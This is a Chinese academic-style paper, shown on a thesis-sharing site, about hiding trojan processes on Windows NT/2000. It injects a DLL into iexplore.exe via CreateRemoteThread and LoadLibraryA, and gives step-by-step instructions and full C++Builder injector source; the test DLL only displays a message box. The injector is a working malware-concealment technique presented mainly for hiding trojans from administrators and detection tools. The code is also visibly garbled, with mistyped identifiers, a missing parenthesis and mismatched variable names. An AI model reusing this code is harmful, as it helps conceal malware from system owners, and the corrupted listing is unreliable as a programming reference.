论文网首页|会计论文|管理论文|计算机论文|医药学|经济学论文|法学论文|社会学论文|文学论文|教育论文|理学论文|工学论文|艺术论文|哲学论文|文化论文|外语论文|论文格式
中国论文网

用户注册

设为首页

您现在的位置: 中国论文网 >> 计算机论文 >> 计算机理论论文 >> 正文 会员中心
 计算机应用论文   计算机理论论文   计算机网络论文   电子商务论文   软件工程论文   操作系统论文   通信技术论文
Windows NT/2000系统下进程的隐藏

摘要  进程的隐藏一直是木马程序设计者不断探求的重要技术,本文采用远程线程技术,通过动态链接库方法,较好地解决了这一问题,通过远程线程将木马作为线程隐藏在其他进程中,从而达到隐藏的目的。

关键字进程  线程  木马  动态链接库

    木马程序(也称后门程序)是能被控制的运行在远程主机上的程序,由于木马程序是运行在远程主机上,所以进程的隐藏无疑是大家关心的焦点。
本文分析了windows nt/2000系统下进程隐藏的基本技术和方法,并着重讨论运用线程嫁接技术如何实现windows nt/2000系统中进程的隐藏。

1 基本原理
    在win95/98中,只需要将进程注册为系统服务就能够从进程查看器中隐形,可是这一切在windows nt/2000中却完全不同, 无论木马从端口、启动文件上如何巧妙地隐藏自己,始终都不能躲过windows nt/2000的任务管理器,windows nt/2000的任务管理器均能轻松显示出木马进程,难道在windows nt/2000下木马真的再也无法隐藏自己的进程了?我们知道,在windows系统下,可执行文件主要是exe和com文件,这两种文件在运行时都有一个共同点,会生成一个独立的进程,寻找特定进程是我们发现木马的方法之一,随着入侵检测软件的不断发展,关联进程和socket已经成为流行的技术,假设一个木马在运行时被检测软件同时查出端口和进程,我们基本上认为这个木马的隐藏已经完全失败。www.11665.COm在windows nt/2000下正常情况用户进程对于系统管理员来说都是可见的,要想做到木马的进程隐藏,有两个办法,第一是让系统管理员看不见你的进程;第二是不使用进程。本文以第二种方法为例加以讨论,其基本原理是将自已的木马以线程方式嫁接于远程进程之中,远程进程则是合法的用户程序,这样用户管理者看到的只是合法进程,而无法发现木马线程的存在,从而达到隐藏的目的。

2 实现方法
  为了弄清实现方法,我们必须首先了解windows系统的另一种"可执行文件"----dll,dll是dynamic link library(动态链接库)的缩写,dll文件是windows的基础,因为所有的api函数都是在dll中实现的。dll文件没有程序逻辑,是由多个功能函数构成,它并不能独立运行,一般都是由进程加载并调用的。因为dll文件不能独立运行,所以在进程列表中并不会出现dll,假设我们编写了一个木马dll,并且通过别的进程来运行它,那么无论是入侵检测软件还是进程列表中,都只会出现那个进程而并不会出现木马dll,如果那个进程是可信进程,(例如浏览器程序iexplore.exe,没人会怀疑它是木马吧?)那么我们编写的dll作为那个进程的一部分,也将成为被信赖的一员,也就达到了隐藏的目的。
  运行dll方法有多种,但其中最隐蔽的方法是采用动态嵌入技术,动态嵌入技术指的是将自己的代码嵌入正在运行的进程中的技术。理论上来说,在windows中的每个进程都有自己的私有内存空间,别的进程是不允许对这个私有空间进行操作的,但是实际上,我们仍然可以利用种种方法进入并操作进程的私有内存。动态嵌入技术有多种如:窗口hook、挂接api、远程线程等,这里介绍一下远程线程技术,它只要有基本的进线程和动态链接库的知识就可以很轻松地完成动态嵌入。
    远程线程技术指的是通过在另一个进程中创建远程线程的方法进入那个进程的内存地址空间。我们知道,在进程中,可以通过createthread函数创建线程,被创建的新线程与主线程(就是进程启动时被同时自动建立的那个线程)共享地址空间以及其他的资源。但是很少有人知道,通过createremotethread也同样可以在另一个进程内创建新线程,被创建的远程线程同样可以共享远程进程(是远程进程)的地址空间,所以,实际上,我们通过一个远程线程,进入了远程进程的内存地址空间,也就拥有了那个远程进程相当的权限。

3 实施步骤
1)      用process32next()函数找到宿主进程,获取宿主进程id,并用
        openprocess()函数打开宿主进程。
2)      用virtualallocex()函数分配远程进程地址空间中的内存。
3)      用writeprocessmemory()函数将待隐藏的dll的路径名。
4)      拷贝到步骤二已经分配的内存中。
5)      用getprocaddress()函数获取loadlibrarya()函数的实地址(在kernel32.dll中)。
6)      用createremotethread()函数在远程进程中创建一个线程。
7)      它调用正确的loadlibrarya()函数。
8)      为它传递步骤二中分配的内存地址。

4  具体实例
    下面是在c++builder 4.0环境下编写的运用远程线程技术隐藏木马的程序代码:
#include <vcl.h>
#include <windows.h>
#include <stdio.h>
#include <tlhelp32.h>//该头文件包涵了进程操作的api函数
#pragma hdrstop
#include "unit1.h"
#pragma package(smart_init)
#pragma resource "*.dfm"

insisting pszlibfilename;//存放待隐藏的dll文件名
handle hprocesssnap=null;//进程快照句柄
handle hremoteprocess;//远程进程句柄
lpvoid pszlibfileremote;//远程进程中分配给文件名的空间
hmodule  phmd;//存放kernel32.dll句柄
handle hremotethread1=null;//存放远程线程句柄

tform1 *form1;
//---------------------------------------------------------
__fast call tform1::tform1(tcomponent* owner)
        : tform(owner)
{
}
//---------------------------------------------------------
void __fastcall tform1::button1click(tobject *sender
{
  processentry32 pe32={0};
  dword dwremoteprocessid;
  hprocesssnap=createtoolhelp32snapshot(th32cs_snapprocess,0);
                                         //打开进程快照
  if(hprocesssnap==(handle)-1)
    {
     messagebox(null,"createtoolhelp32snapshot failed","",mb_ok);
     exit(0);
    }  //失败返回

  pe32.dwsize=sizeof(processentry32);
  if(process32first(hprocesssnap,&pe32)) //获取第一个进程
   {
     do{
        ansistring  te;
        te=pe32.szexefile;
         if(te.pos("iexplore.exe")|| te.pos("iexplore.exe"))
                                 //找到宿主进程,以iexplore.exe为例
            { dwremoteprocessid=pe32.th32processid;
              break;
            }
       }
     while(process32next(hprocesssnap,&pe32));//获取下一个进程
   }
  else
   {
    messagebox(null,"取第一个进程失败","",mb_ok);
    exit(0);
   }
   hremoteprocess=openprocess(process_create_thread|process_vm
             _operation|process_vm_write,false,dwremoteprocessid);
                                     //打开远程进程
   pszlibfilename=getcurrentdir()+"\\"+"hide.dll";
                                     // 假设hide.dll是待隐藏的进程
   int cb=(1+pszlibfilename.length())*sizeof(char);//计算dll文件名长度
   pszlibfileremote=(pwstr)virtualallocex(hremoteprocess,null,cb,
            mem_commit,page_readwrite);
                                    //申请存放文件名的空间
   bool returncode=writeprocessmemory(hremoteprocess,
            pszlibfileremote,(lpvoid)pszlibfilename.c_str(),cb,null);
                                   //把dll文件名写入申请的空间
   phmd=getmodulehandle("kernel32.dll");
   lpthread_start_routine fnstartaddr=(lpthread_start_routine)
            getprocaddress(phmd,"loadlibrarya");
                                  //获取动态链接库函数地址
   hremotethread1=createremotethread(hremoteprocess,null,0,
            pfnstartaddr,pszlibfileremote,0,null);
                                  //创建远程线
   if(hremotethread1!=null)
     closehandle(hremotethread1);//关闭远程线程
   if(hprocesssnap!=null)
     closehandle(hprocesssnap);//关闭进程快照
}

  该程序编译后命名为rmtdll.exe,运行时点击界面上的按钮即可。
    至此,远程嵌入顺利完成,为了试验我们的hide.dll是不是已经正常地在远程线程运行,我同样在c++builder4.0环境下编写并编译了下面的hide.dll作为测试:

#include <vcl.h>
#include <windows.h>
#pragma hdrstop
#pragma argsused
bool winapi dllentrypoint(hinstance hinst, unsigned long reason, void* lpreserved)
{
   char szprocessid[64];
   switch(reason)
    {
      case dll_process_attach:
       {//获取当前进程id
        itoa(getcurrentprocessid(),szprocessid,10);
        messagebox(null,szprocessid,"remotedll",mb_ok);
        break;
       }
      default:
    }
  return true;
}
  当使用rmtdll.exe程序将这个hide.dll嵌入iexplore.exe进程后假设pid=1208),该测试dll弹出了1208字样的确认框,同时使用ps工具
也能看到:
   process id: 1208
   c:\winnt\iexplore.exe (0x00400000)
   ……
   c:\winnt\hide.dll (0x100000000)
   ……
  这证明hide.dll已经在iexplore.exe进程内正确地运行了。上面程序的头文件由编译器自动生成,未作改动,故略之。
5  结束语
    进程隐藏技术和方法有很多,而且这一技术发展也相当快,本文仅从一个侧面加以讨论,希望通过这一探讨让我们对进程隐藏技术有一个更清楚的认识,同时也为我们防范他人利用进程隐藏手段非法入侵提供参考,本文抛砖引玉,不当之处诚恳批评指正。

 


参考文献
1  jeffrey richter著 王建华、张焕生、侯丽坤等译  windows核心编程   机械工业出版社2 
k.赖斯多夫 h. 亨德森著  希望图书创作室译 borland c++ builder 实用培训教程
上一页  [1] [2] [3]

  • 上一个计算机论文:
  • 下一个计算机论文:
  •  作者:佚名 [标签: 系统 进程 ]
    姓 名: *
    E-mail:
    评 分: 1分 2分 3分 4分 5分
    评论内容:
    发表评论请遵守中国各项有关法律法规,评论内容只代表网友个人观点,与本网站立场无关。
    WiFi通信技术在钻井现场的应用
    论基于Intranet技术的计算机通信网络的即时
    Win8的“心”,Win7的“脸”
    Blue袭来—Win8的继任者?(下)
    Win8应用更轻松
    暑假在即,Win8也能玩转老游戏
    Win8 Style,《WPS Office 2013抢鲜版》初体
    最超值Win8平板 华硕 ME400C平板电脑
    操作更简单!详解Win8资源管理器
    碉堡了!Win8也玩Ubuntu 3D特效
    PC操作系统份额:Win XP首次跌破40% Win8仅
    玩转Win8
    | 设为首页 | 加入收藏 | 联系我们 | 网站地图 | 手机版 | 论文发表

    Copyright 2006-2013 © 毕业论文网 All rights reserved 

     [中国免费论文网]  版权所有